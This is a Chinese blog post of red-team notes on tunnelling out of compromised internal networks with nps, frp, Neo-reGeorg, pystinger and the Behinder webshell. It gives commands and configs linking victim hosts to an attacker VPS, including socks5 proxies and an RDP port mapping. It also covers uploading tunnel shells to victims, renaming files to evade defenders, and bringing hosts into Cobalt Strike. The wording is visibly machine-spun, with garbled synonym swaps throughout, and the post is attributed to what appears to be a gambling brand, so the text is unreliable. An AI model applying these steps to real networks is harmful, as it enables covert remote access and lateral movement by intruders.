新闻动态

?+
+
内网渗入-代理转发笔记
在内网渗入中,分为出网和不出网,不出网的意思是指标利用服务器与互联网网络不成达,选取代理服务或映射web端口用于在互联网上的交互。
●
https://github.com/ehang-io/nps/releases
筹备工作:一台云vps,作为nps服务端
●
./nps install //装置没有权限的话,chmod 777 nps
●
装置实现后,会在/etc/nps/conf目录天生如下配置文件,进行配置批改,批改默认账户密码,预防被攻击利用。
/etc/nps/conf/nps.conf

●
会启动一个web服务,用配置好的端口,账户密码接见。
./nps start //运行服务端,终场./nps stop

●
配置压缩和加密,削减被攻击危险


增长后,可查看到客户端配置号令

●
./npc -server=47.XX.XX.xxx:8024 -vkey=hmqha8eove21cevu -type=tcp //linux npc.exe -server=47.XX.xX.xxx:8024 -vkey=hmqha8eove21cevu -type=tcp
//windows
运行成功后(把稳:低版本npc,批改为npc1,360不拦截,火绒会提醒装置拦截)

客户端显示在线,注明能够进行代理了

●
在渗入中常用tcp端口转发来接见内网主机,用socks5进行接见内网web服务等。
TCP

socks5
使用proxifier或浏览器代理插件,带入内网接见内部web



Frp(出网)
FRP(Fast Reverse Proxy)是一款单一,好用,不变的隧路工具。FRP 使用Go说话开发,它是一款高机能的反向代理利用,能够轻松地进行内网穿透,对表网提供服务。FRP 支持TCP、UDP、KCP、HTTP、HTTPS等和谈类型,并且支持Web服务凭据域名进行路由转发。在进行内网渗入中,FRP是常用的一款隧路工具。
●
下载
https://github.com/fatedier/frp/releases/tag/v0.46.1

●
上传服务端
同时上传批改好的配置文件frps.ini到自己的VPS,如下进走运行
./frps -c frps.ini
[common]
bind_addr = 0.0.0.0 #绑定的ip,为本机
bind_port = 17000 #绑定的端口
dashboard_addr = 0.0.0.0 #治理地址
dashboard_port = 27500 #治理端口,可视化节造台,http接见
dashboard_user = root #治理的用户名
dashboard_pwd = 1wsdfeew3!@1$# #治理用户的密码,尽量复杂一点,安全
token = 1q2w3e #客户端服务端衔接的密码
heartbeat_timeout = 90 #心跳超不断间
max_pool_count = 5 #最包头时衔接数
●
上传客户端
在获取到shell时,批改文件名称后再上传,预防被蓝队发现。
常用端口映射和socks代理
frpc.exe -c frpc.ini
[common]
server_addr = 100.20.14.14
server_port = 17000 #服务器绑定的端口,和服务端bind_port对应
token = 1q2w3e #衔接的密码,和服务端对应
pool_count = 5
protocol = tcp #和谈类型
health_check_type = tcp
health_check_interval_s = 100
#socks代理
[test]
remote_port = 10000 #代理的端口
plugin = socks5 #使用的和谈
use_encryption = true #是否加密
use_compression = true
#端口映射
[test]
type=tcp
local_ip = 127.0.0.1 #本地ip地址
local_port = 3389 #要映射的本地端口
remote_port = 3389 #要映射的服务端端口
衔接socks5代理端口10000,进行查抄是否成功

neo-reg(不出网)
Neo-reGeorg 是一个旨在积极沉构 reGeorg 的项目,主张是:
● 提高可用性,预防特点检测
● 提高 tunnel 衔接安全性
● 提高传输内容保密性
● 应对更多的网络环境场景下使用
1、天生隧路马,将隧路顿时传至服务器web目录
python neoreg.py generate -k password
2、使用 neoreg.py 衔接WEB服务器,在本地成立socks5代理
python3 neoreg.py -k password -u http://xx/tunnel.php

3、socks5客户端衔接,默认127.0.0.1:1080

pystinger(不出网)
毒刺(pystinger)通过webshell实现内网SOCK4正向代理,端口映射.
可直接用于metasploit-framework,viper,cobalt strike上线.
主体使用python开发,当前支持php,jsp(x),aspx三种代理剧本.
https://github.com/FunnyWolf/pystinger
1、将隧路shell,服务端上传至受害机
start stinger_server.exe 0.0.0.0 #注:必须设置为0.0.0.0,不然无法成功!
2、运行客户端
./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 #只需代替-w的参数url
3、上线CS机械
在对不出网段中的其他内网主机进行横向移动上线时,可执行完以上操作后在CobaltStrike创建一个Listener,HTTP Hosts填192.168.59.133(即受害机内网IP),HTTP Port填60020

冰蝎webshell(不出网)
socks代理的端口不是开在远程服务器上的,是开在本地的,利用socks客户端直接衔接本地IP的代理端口即可,冰蝎会把本地端口的流量通过http隧路透传至远程服务器网络。
内网穿透职能,配置socks隧路,本地IP、端口代理。

E·N·D
本文由mg不朽情缘创安尝试室编纂。
本文仅限于幼我进建和技术钻研,由于传布、利用此文所提供的信息而造成刑事案件、非授权攻击等违法行为,均由使用者自己掌管,本单元不为此承担任何责任。创安攻防尝试室占有对此文章的批改和诠释权,如欲转载或传布此文章,必须保障此文章的齐全性,蕴含版权申明等全数内容。
如有侵权,请联系后盾。
●
创安尝试室
mg不朽情缘创安尝试室,是mg不朽情缘旗下的技术钻研团队,成立于2021年9月,重要钻研红蓝匹涤注沉大安全保险、应急响应等方向。
创安攻防尝试室圆满实现了屡次公安进行的沉要网络安全保险和攻防演习活动,并积极参与各类网络安全较量,屡获殊荣。
创安攻防尝试室秉承mg不朽情缘的发展理想,致力打造国内一流网络安全团队。
